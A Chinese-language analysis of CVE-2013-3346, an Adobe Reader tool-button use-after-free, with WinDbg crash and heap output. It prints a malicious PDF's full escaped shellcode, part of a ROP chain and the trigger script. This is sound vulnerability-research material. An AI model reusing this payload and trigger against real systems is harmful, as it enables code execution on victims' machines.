CVE-2013-3346-Adobe Reader ToolButton 释放后重用(UAF)漏洞

前言

这是一个在“Epic Turla”网络间谍攻击行动中被使用过的漏洞,是一个 PDF 漏洞。

漏洞分析

环境

win7 sp1 32位
windbg
ida
peepdf
adobe reader 11.0.00

ftp://ftp.adobe.com/pub/adobe/reader/win/11.x/11.0.00/zh_CN/AdbeRdr11000_zh_CN.exe

安装peepdf

pip install peepdf

-i 参数用于开启交互模式

peepdf -i ./msf.pdf

结果并不是很好使

我们直接把下面以 Q= 开头的内容复制到一个文件里面

之后即可解码

PPDF> js_jjdecode file jjencode.txt

var shellcode = unescape("%u00E8%u0000%u5D00%uED83%uE905%u008B%u0000%u5052%uD231%uC031%uF980%u7501%u6604%uEBAD%uAC01%u003C%u0D74%u613C%u0272%u202C%uCAC1%u010D%uEBC2%u39E3%u58DA%uC35A%u8956%uB2DA%u313C%u66C0%u028B%uD801%u508B%u0178%u52DA%u8B51%u184A%u428B%u0120%u8BD8%u0138%u53DF%u1E8B%uF787%u3151%uE8C9%uFFAE%uFFFF%u5B59%uF787%u0275%u08EB%uC083%u4904%u22E3%uDFEB%u428B%u2918%u89C8%u8BC1%u2442%uD801%u8B66%u480C%u428B%u011C%uC1D8%u02E1%uC801%u008B%uD801%u0689%u5A59%uC683%uE204%u5EAE%u31C3%u64D2%u528B%u8B30%u0C52%u528B%uB114%u8B01%u2872%u17BB%u2BCA%uE86E%uFF5A%uFFFF%u5A8B%u8B10%u7512%u31EC%uB1C9%u680E%uFA7C%u1596%uE668%u785C%u680F%u937D%uBDFA%u2068%uEA96%u6895%uBE1B%u1A09%uDA68%u7A8B%u68AE%u6CEF%uE688%u6868%u88F6%u680D%u4676%u8A8B%uCA68%u2A6A%u6895%u0B95%u1A7F%u4568%u9E3C%u6857%uBE1C%u302E%u4E68%uDFCC%u8912%uE8E6%uFF28%uFFFF%uBD8D%u040E%u0000%u0C6A%u8059%uC837%uE247%u6AFA%u686C%u746E%u6C64%uFF54%u1456%uF883%u0F00%uD484%u0001%u5600%uC931%u8941%u68C3%uFD91%u5947%uE689%uF3E8%uFFFE%u6AFF%u8901%u68E7%u2000%u0000%uE189%u406A%u0068%u1030%u5100%u006A%u6A57%uFFFF%u5916%u5E59%u835E%u00F8%u850F%u019B%u0000%u90B0%u89FC%uB9CF%u0EF5%u0000%uAAF3%uB956%u010B%u0000%uB58D%u0303%u0000%uA4F3%uFF5E%u1056%u0789%u858D%u040E%u0000%u006A%u006A%u036A%u006A%u006A%u006A%uFF50%u0C56%uF883%u0F00%u5C84%u0001%u8900%u6AC7%u6804%u1000%u0000%u0068%u0004%u6A00%uFF00%u0456%uF883%u0F00%u4084%u0001%uC700%u1440%u0125%u0703%u40C7%uAD1C%u0000%uC700%u2C40%u0020%u0000%u40C7%u0430%u0000%uC700%u3840%uBEEF%uDEAD%u006A%uE289%u006A%u6852%u0080%u0000%u6850%u0400%u0000%u6850%u23C8%u8FFF%uFF57%u0856%uDB31%u5255%uE789%u8352%u04C3%uC031%u5050%u5350%u56FF%u8334%uFFF8%uEF74%uC031%u5350%u56FF%u832C%uFFF8%uE374%u003D%u0010%u7C00%u89DC%u89C5%u31E0%u51C9%u6A50%u5704%uFF53%u3056%u3F81%u5025%u4644%uC575%uC483%u8908%u5DEF%uEF83%u6A04%u6804%u1000%u0000%u6A57%uFF00%u0456%uC931%u5150%u5754%u5350%u56FF%u5830%uF989%uD231%uFA80%u7401%u8111%uF238%u0909%u750A%u831E%u04C0%uC2FE%u8950%u57FB%u5256%u8950%u89C6%u29DA%u89FA%uF6D0%u28E2%u8006%uF336
%u5A58%u405E%uE24F%u5FD1%u8158%uC8EC%u0000%u8900%u83E3%u0CEC%u5350%uC868%u0000%uFF00%u2456%u438D%u31FC%u89C9%u5308%u5051%uFF53%u2856%u43C7%u2FFC%u2063%uC720%uF843%u6D63%u2064%u8958%u31C5%u51C9%u6A51%u5102%u6851%u0000%u4000%uFF53%u0C56%uEB83%u5308%uC389%uC931%u8951%u51E0%u5750%u5355%u56FF%u531C%u56FF%u5820%u315B%u6AC0%u5300%u56FF%uFF18%u6016%u00E8%u0000%u5B00%uEB83%u8B06%u004D%u498B%u8104%u00E1%uFFF0%u66FF%u3981%u5A4D%u840F%u0093%u0000%uE981%u1000%u0000%uEDEB%u5052%uD231%uC031%uF980%u7501%u6604%uEBAD%uAC01%u003C%u0D74%u613C%u0272%u202C%uCAC1%u010D%uEBC2%u39E3%u58DA%uC35A%u8956%uB2DA%u313C%u66C0%u028B%uD801%u508B%u0178%u52DA%u8B51%u184A%u428B%u0120%u8BD8%u0138%u53DF%u1E8B%uF787%u3151%uE8C9%uFFAE%uFFFF%u5B59%uF787%u0275%u08EB%uC083%u4904%u22E3%uDFEB%u428B%u2918%u89C8%u8BC1%u2442%uD801%u8B66%u480C%u428B%u011C%uC1D8%u02E1%uC801%u008B%uD801%u0689%u5A59%uC683%uE204%u5EAE%u89C3%u89DD%u31CB%u41C9%u7468%uACC9%u894A%uE8E6%uFF88%uFFFF%u006A%uE789%u8B57%u0B85%u0001%u5000%u16FF%u835F%u00F8%u2675%u006A%uE089%u6A50%uFF04%u5E16%uF883%u7500%u8117%uC8C6%u0000%u8100%uC8C7%u0000%u8B00%u8906%uC707%u6C47%u0000%u0000%u6158%u01B8%u0001%uC200%u0004%u9494%u94E6%u8C86%uBA98%uB0A7%uC8B1");
var executable = "";
var rop9 = "";
rop9 += unescape("%u313d%u4a82");
rop9 += unescape("%ua713%u4a82");
rop9 += unescape("%u1f90%u4a80");
rop9 += unescape("%u9038%u4a84");
rop9 += unescape("%u7e7d%u4a80");
rop9 += unescape("%uffff%uffff");
......
......
......
......
省略

分析这段 js,基本也能看出问题所在:除了堆喷射部分之外,关键代码就下面几行

// Trigger pattern analysed in this write-up (CVE-2013-3346): a tool button's
// cEnable callback creates a second button whose own cEnable callback removes
// the first button while it is still being used, leaving a dangling reference.
// The allocation loop at the end runs right after the removal; together with
// the heap-spray buffers shown earlier it is presumably meant to reoccupy the
// freed block (the debugger output below shows the freed slot as "busy" with
// size 0x370). The comments on the code lines translate the original author's
// notes. arr, part1 and part2 are not declared in this fragment — they come
// from elsewhere in the decoded script (not shown) — and i is an implicit
// global. The author turns Protected Mode off when opening the file for
// debugging and is unsure whether reproduction works with it left on.
app.addToolButton({
cName: "evil",
cExec: "1",
cEnable: "addButtonFunc();"
}); // create the "evil" button and set addButtonFunc as its callback

addButtonFunc = function() {
app.addToolButton({cName: "xxx", cExec: "1", cEnable: "removeButtonFunc();"});
} // create the child button "xxx" and set removeButtonFunc as its callback

removeButtonFunc = function() {
app.removeToolButton({cName: "evil"}); // remove the parent object; the child still holds a reference to the parent, which causes the use-after-free

// NOTE(review): these allocations happen immediately after the removal above;
// what part1/part2 hold is not visible in this fragment.
for (i=0;i < 10;i++)
arr[i] = part1.concat(part2);
}

调试

我们调试看看。打开文件时最好先把保护模式(Protected Mode)关掉(第一次启动时应该会询问你),否则我也不确定能不能复现;保护模式本身就是一层缓解措施,这里只是为了调试才关闭。

(95c.eb0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c08a8 ebx=00000001 ecx=0891fe18 edx=000011c4 esi=0891fe18 edi=00000000
eip=4a82f129 esp=0023e51c ebp=0023e540 iopl=0 nv up ei pl nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213
4a82f129 ?? ???
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll -
0:000> kv
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
0023e518 6219e85d bb5ba807 00000001 0891fe18 0x4a82f129
0023e540 6219e0d2 00000000 0891fe18 00000000 AcroRd32!DllCanUnloadNow+0x150536
0023e564 6219f3e3 0023e5b8 6219d996 6219f409 AcroRd32!DllCanUnloadNow+0x14fdab
0023e56c 6219d996 6219f409 08706f18 bb5ba8ff AcroRd32!DllCanUnloadNow+0x1510bc
0023e5b8 6219c68c 00000000 bb5ba8af 08706f18 AcroRd32!DllCanUnloadNow+0x14f66f
0023e5e8 6219c50e 086fabb8 04d6b090 bb5bab3f AcroRd32!DllCanUnloadNow+0x14e365
0023e678 6219c206 08706f18 09729c48 0023e694 AcroRd32!DllCanUnloadNow+0x14e1e7
0023e688 6219c1a1 08706f18 0023e6c0 620f712e AcroRd32!DllCanUnloadNow+0x14dedf
0023e694 620f712e 08706f18 04d6b090 bb5bab87 AcroRd32!DllCanUnloadNow+0x14de7a
0023e6c0 6219ae0e 62b4cfb8 ffffffff 09729c30 AcroRd32!DllCanUnloadNow+0xa8e07
0023e6f0 62196d1d 00000001 0023e6c8 6219c193 AcroRd32!DllCanUnloadNow+0x14cae7
0023e714 62196bf1 000006c4 04d6b090 096ea780 AcroRd32!DllCanUnloadNow+0x1489f6
0023e72c 6219434c 04d6b090 bb5baa83 00000000 AcroRd32!DllCanUnloadNow+0x1488ca
0023e7c4 6204e440 00000000 04d6b090 00000000 AcroRd32!DllCanUnloadNow+0x146025
0023e7f0 62193a64 bb5ba55f 000006c4 086fabb8 AcroRd32!DllCanUnloadNow+0x119
0023e818 625f38ef 087dbde8 00000000 086fabb8 AcroRd32!DllCanUnloadNow+0x14573d
0023e894 625f3b7c 04e51dd0 00000001 086a2588 AcroRd32!CTJPEGRotateOptions::operator=+0xff7d3

我们看看前面调用的是什么,可以看到被劫持控制流所用的 eax 来源于 esi(mov eax,dword ptr [esi])。注意:由于没有符号文件,栈回溯里的 DllCanUnloadNow+0x... 只是最近的导出符号,并不是真实的函数名。

0:000> ub 6219e85d 
AcroRd32!DllCanUnloadNow+0x150518:
6219e83f 897dfc mov dword ptr [ebp-4],edi
6219e842 ff96d0020000 call dword ptr [esi+2D0h]
6219e848 0fb7d8 movzx ebx,ax
6219e84b 8b06 mov eax,dword ptr [esi]
6219e84d 59 pop ecx
6219e84e 8bce mov ecx,esi
6219e850 66899ecc020000 mov word ptr [esi+2CCh],bx
6219e857 ff9064030000 call dword ptr [eax+364h]

我们看看 esi 指向的内存:由于堆喷射已经占住了这块被释放的内存,所以状态是 busy,这里也可以看到其大小是 0x370

0:000> !heap -p -a esi
address 0891fe18 found in
_HEAP @ 2570000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
0891fe10 0071 0000 [00] 0891fe18 00370 - (busy)


0:000> dd esi
0891fe18 0c0c08a8 41414141 41414141 41414141
0891fe28 41414141 41414141 41414141 41414141
0891fe38 41414141 41414141 41414141 41414141
0891fe48 41414141 41414141 41414141 41414141
0891fe58 41414141 41414141 41414141 41414141
0891fe68 41414141 41414141 41414141 41414141
0891fe78 41414141 41414141 41414141 41414141
0891fe88 41414141 41414141 41414141 41414141

懒得找更纯粹的 PoC 了,否则能更精确地观察到 UAF 的过程
